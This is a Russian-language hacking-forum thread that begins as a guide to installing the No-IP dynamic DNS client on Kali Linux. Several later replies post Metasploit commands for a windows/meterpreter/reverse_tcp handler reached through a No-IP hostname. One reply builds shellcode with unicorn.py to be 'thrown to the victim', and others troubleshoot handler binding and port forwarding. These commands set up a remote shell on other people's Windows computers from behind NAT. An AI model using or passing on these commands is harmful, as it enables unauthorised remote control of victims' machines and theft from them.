ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.io/forumdisplay.php?f=209)
-   -   No-IP, или что делать если ip не белый (https://forum.antichat.io/showthread.php?t=558444)

kot-gor 16.11.2016 20:56

Всем привет, часто в ветке форума встречаю, что делать если у меня нет белого ip? Один из вариантов это использовать сервис no-ip.Сейчас я постараюсь подробно рассказать как можно его установить в среде всеми нами любимого kali, и так поехали!!
Самое первое это заходим по адресу http://www.noip.com проходим регистрацию.
далее на этом же сайте скачиваем клиент.

https://forum.antichat.xyz/attachmen...23fb24649e.png

после того как скачали,копируем в удобное место, распаковываем, и переходим в директорию с распакованным пакетом.

https://forum.antichat.xyz/attachmen...45fae8d8c7.png

Далее командой make install запускаем установку данного пакета.

в процессе указываем свой почтовый ящик,который вводили при регистрации no-ip.
пароль,а также выбираем интервал обновления,я выбрал 5 минут. по умолчанию 30.
Так же у нас спросят Do you wish to run something at successful update?[N] (y/N) - Нажмите "y" чтобы обновить хост сейчас.

https://forum.antichat.xyz/attachmen...1212589c37.png

Запускается no-ip командой командой no-ip2

https://forum.antichat.xyz/attachmen...6f1738d5e2.png

Вот и все, как видите ничего сложно.всем спасибо за внимания и удачи.

kot-gor 17.11.2016 00:34

Цитата:


m0tion сказал(а):

Можно устанавливать не обязательно на Linux. Я например на роутере(Mikrotik) скрипт поставил.


да конечно, здесь я описал один из вариантов..

Vander 17.11.2016 00:38

Наконец-то, кто то это описал)) Все никак руки не доходили. Спасибо за статью.

kot-gor 17.11.2016 04:56

Цитата:


fvn сказал(а):

Может стоит изменить название на "что делать если ip динамический". В случае серых адресов No-Ip не поможет.


Вы уверены в своем утверждении? Как раз в этом примере что я показывал, no-ip стоит на машине с адресом 192.168.... после NAT, адрес самого роутера в сети 10.10....(что и есть серый). Все прекрасно работает!

kot-gor 17.11.2016 15:11

возможно с паролем или логином ошиблись

<~DarkNode~> 17.11.2016 18:33

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dnsимя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд

Код:


Код:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j


kot-gor 17.11.2016 18:56

Цитата:


~~DarkNode~~ сказал(а):

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dnsимя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд

Код:


Код:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j


И не забыть пробросить нужные порты в роутере .

kot-gor 17.11.2016 20:21

у вас белый статический ip, у многих такое отсутствует...

kot-gor 18.11.2016 17:25

Цитата:


DoberGroup сказал(а):

А как Вы через провайдерский NAT, простите, порты пробрасываете? DDNS это ведь не самоцель, это вспомогательный инструмет


Я пробрасываю порты только на своем роутере.

kot-gor 18.11.2016 19:30

я не смотрел топологию провайдера..хотя интерес вы подогрели,нужно на досуге глянуть.

kot-gor 24.11.2016 16:37

Спасибо, очень подробный мануал.

kot-gor 08.12.2016 18:51

Цитата:


pazle сказал(а):

Пробую эксплойт с такими настройками (предварительно порт на машине открыл):

Код:


Код:

set> IP address for the payload listener (LHOST):80.200.150.250
set:payloads> Port to connect back on [443]:443[*] All good! The directories were created.
Затем пробую установить сессию и вылезает ошибка:
[-] Handler failed to bind to 80.200.150.250:443:-  -
[-] Handler failed to bind to 0.0.0.0:443:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).
msf exploit(handler) >


Попробуйте добавить строчку следующего содержания
set ReverseListenerBinAddress (локальный ip)

DmityiD 08.12.2016 21:48

Я использую ddclient, работает за nat и не только с no-ip. Гибкий в настройках. Если кому необходимо выложу конфигурации.

kot-gor 08.01.2017 02:40

Цитата:


for(i=0;i<225;i++); сказал(а):

после установки программы я указал все дынные, оно работает!!Скажите после перезагрузки компа заново нужно будет вводить логин и пароль через консоль???
[doublepost=1483822492,1483822335][/doublepost]

после установки программы я указал все дынные, оно работает!!Скажите после перезагрузки компа заново нужно будет вводить логин и пароль через консоль??? и как пробросить роутер Zyxel Keenetic Lite III можно инструкцию???

Если не добавили сервис в автозагрузку то да.

Pushkinmazila 09.02.2017 21:58

Цитата:


~~DarkNode~~ сказал(а):

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dnsимя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP


А вот тут вот по подробнее плиз

Для создания полезной нагрузки я юзаю это https://codeby.net/threads/bystryj-sposob-poluchit-meterpreter.58440/

Merkif 10.02.2017 11:29

Здравствуйте.
при вводе команд выдает ошибки
error runing command: Rex:: Timeouterror Operation timed out. С чем это может быть связано?
Особенно когда делаю скрины или же пытаюсь что либо загрузить.
[doublepost=1486710208,1486708753][/doublepost]и Сессия долго открывается минут 10-15
[doublepost=1486710879][/doublepost]пользуюсь no ip
[doublepost=1486711593][/doublepost]

Цитата:


Pushkinmazila сказал(а):

А вот тут вот по подробнее плиз

Для создания полезной нагрузки я юзаю это https://codeby.net/threads/bystryj-sposob-poluchit-meterpreter.58440/

Для получения шелкода

Код:


Код:

python unicorn.py windows/meterpreter/reverse_tcp test.ddns.net 443
Шелкод бросаем "жертве"
и от руки в Метасплоите пишем.

Код:


Код:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST test.ddns.net
set LPORT 443
set REVERSELISTENERBINDADDRESS 192.168.88.5
exploit -j

[doublepost=1486711749][/doublepost]Ну и порт на роутере перебросить на локальный адрес.

kot-gor 25.06.2017 00:23

Цитата:


jaguar сказал(а):

No-IP
и файл попадает в автозагрузку?


как он попадет если вы не внесли его, чудес не бывает..)


Время: 19:43